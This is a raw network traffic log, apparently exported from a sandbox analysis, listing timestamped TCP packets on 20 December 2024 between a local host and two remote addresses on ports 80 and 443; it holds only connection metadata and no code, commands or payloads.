                                                                                                      Dec 20, 2024 07:18:02.909257889 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.911627054 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.911712885 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.911763906 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.914186001 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.914315939 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.914365053 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.916829109 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.916865110 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.916917086 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.919492006 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.919543028 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.919629097 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.921977043 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.922080040 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.922135115 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.925271034 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.925323963 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.925384045 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.927187920 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.927309036 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.927366018 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.931993008 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.932127953 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.932190895 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.934214115 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.934303045 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.934473991 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.934926987 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.935081005 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.935213089 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.937560081 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.937597990 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.937715054 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.989324093 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.989404917 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.989450932 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.990576029 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.990696907 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.990757942 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.993181944 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.993275881 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.993448973 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.995764971 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.995876074 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.995929003 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.998366117 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.998480082 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:02.998564005 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.000950098 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.001051903 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.001106024 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.003544092 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.003660917 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.003719091 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.006122112 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.006222963 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.006274939 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.008744001 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.009066105 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.009124994 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.011357069 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.011470079 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.011528969 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.013935089 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.014081955 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.014136076 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.016571045 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.016623974 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.016676903 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.019097090 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.019211054 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.019280910 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.021692991 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.021847010 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.021895885 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.024291039 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.024400949 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.024449110 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.026940107 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.026990891 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.027049065 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.029309034 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.029437065 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.029488087 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.031857967 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.031919956 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.031979084 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.034244061 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.034539938 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.034617901 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.036676884 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.036885023 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.036930084 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.039148092 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.039453030 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.039585114 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.041613102 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.041760921 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.041806936 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.043776989 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.043888092 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.043950081 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.045912981 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.046088934 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.046169996 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.047982931 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.048621893 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.048687935 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.049268961 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.049395084 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.049453974 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.050579071 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.050683975 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.050766945 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.051919937 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.052017927 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.052064896 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.053221941 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.053328037 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.053378105 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.054541111 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.054647923 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.054691076 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.055855989 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.055942059 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.056370974 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.057157993 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.057348013 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.057434082 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.058439016 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.058645010 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.058856964 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.059726000 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.059855938 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.060219049 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.061144114 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.061244965 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.061592102 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.062263966 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.062386990 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.062458992 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.063553095 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.063705921 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.063780069 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.064762115 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.064873934 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.064917088 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.066041946 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.066167116 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.066212893 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.067279100 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.067385912 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.067445993 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.068519115 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.068608046 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.068661928 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.069756985 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.069871902 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.069922924 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.070990086 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.071104050 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.071228027 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.072256088 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.072390079 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.072437048 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.073535919 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.073715925 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.073766947 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.074749947 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.074995041 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.075047016 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.076006889 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.076113939 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.076164007 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.077294111 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.077440023 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.077495098 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.078561068 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.078649998 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.078866959 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.079770088 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.079879999 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.079933882 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.081012964 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.122725964 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.181446075 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.181500912 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.181554079 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.181766033 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.181921005 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.181966066 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.183031082 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.183161020 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.183387995 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.184278011 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.184401989 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.184519053 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.185518026 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.185722113 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.185769081 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.186738968 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.186837912 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.186889887 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.187933922 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.188045025 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.188154936 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.189106941 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.189213037 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.189260006 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.190279961 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.190346003 CET8049733147.45.44.131192.168.2.4
                                                                                                      Dec 20, 2024 07:18:03.190444946 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:03.856841087 CET4973380192.168.2.4147.45.44.131
                                                                                                      Dec 20, 2024 07:18:04.631946087 CET49736443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:04.632011890 CET44349736172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:04.632328987 CET49736443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:04.635792971 CET49736443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:04.635812044 CET44349736172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:05.859973907 CET44349736172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:05.860091925 CET49736443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:05.863894939 CET49736443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:05.863903999 CET44349736172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:05.864296913 CET44349736172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:05.904129028 CET49736443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:05.932792902 CET49736443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:05.932792902 CET49736443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:05.932919025 CET44349736172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:06.583075047 CET44349736172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:06.583173990 CET44349736172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:06.583332062 CET49736443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:06.584990978 CET49736443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:06.585006952 CET44349736172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:06.585048914 CET49736443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:06.585055113 CET44349736172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:06.598316908 CET49738443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:06.598335981 CET44349738172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:06.598690033 CET49738443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:06.599117041 CET49738443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:06.599128962 CET44349738172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:07.813779116 CET44349738172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:07.813883066 CET49738443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:07.815257072 CET49738443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:07.815267086 CET44349738172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:07.815608978 CET44349738172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:07.816890001 CET49738443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:07.816890001 CET49738443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:07.816971064 CET44349738172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:08.586481094 CET44349738172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:08.586565971 CET44349738172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:08.586628914 CET49738443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:08.586633921 CET44349738172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:08.586657047 CET44349738172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:08.586707115 CET49738443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:08.586719990 CET44349738172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:08.594743967 CET44349738172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:08.594810009 CET49738443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:08.594819069 CET44349738172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:08.603254080 CET44349738172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:08.603355885 CET49738443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:08.603363037 CET44349738172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:08.653995991 CET49738443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:08.654004097 CET44349738172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:08.700865984 CET49738443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:08.722821951 CET44349738172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:08.763375044 CET49738443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:08.763391018 CET44349738172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:08.810259104 CET49738443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:08.810291052 CET44349738172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:08.850482941 CET44349738172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:08.850533009 CET49738443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:08.850543022 CET44349738172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:08.850601912 CET44349738172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:08.850747108 CET49738443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:08.850766897 CET44349738172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:08.850776911 CET49738443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:08.850783110 CET44349738172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:08.850800991 CET49738443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:08.850805998 CET44349738172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:08.934788942 CET49739443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:08.934842110 CET44349739172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:08.934946060 CET49739443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:08.935358047 CET49739443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:08.935376883 CET44349739172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:10.149437904 CET44349739172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:10.149525881 CET49739443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:10.151052952 CET49739443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:10.151082039 CET44349739172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:10.151329041 CET44349739172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:10.152475119 CET49739443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:10.152616978 CET49739443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:10.152659893 CET44349739172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:10.152740955 CET49739443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:10.152755022 CET44349739172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:11.390130997 CET44349739172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:11.390218973 CET44349739172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:11.390445948 CET49739443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:11.390603065 CET49739443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:11.390642881 CET44349739172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:11.413384914 CET49740443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:11.413422108 CET44349740172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:11.413547039 CET49740443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:11.413983107 CET49740443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:11.413999081 CET44349740172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:12.631912947 CET44349740172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:12.632006884 CET49740443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:12.633593082 CET49740443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:12.633625031 CET44349740172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:12.633846045 CET44349740172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:12.635361910 CET49740443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:12.635493994 CET49740443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:12.635493994 CET49740443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:12.635538101 CET44349740172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:13.476598978 CET44349740172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:13.476681948 CET44349740172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:13.476856947 CET49740443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:13.477111101 CET49740443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:13.477130890 CET44349740172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:13.550340891 CET49741443192.168.2.4172.67.197.170
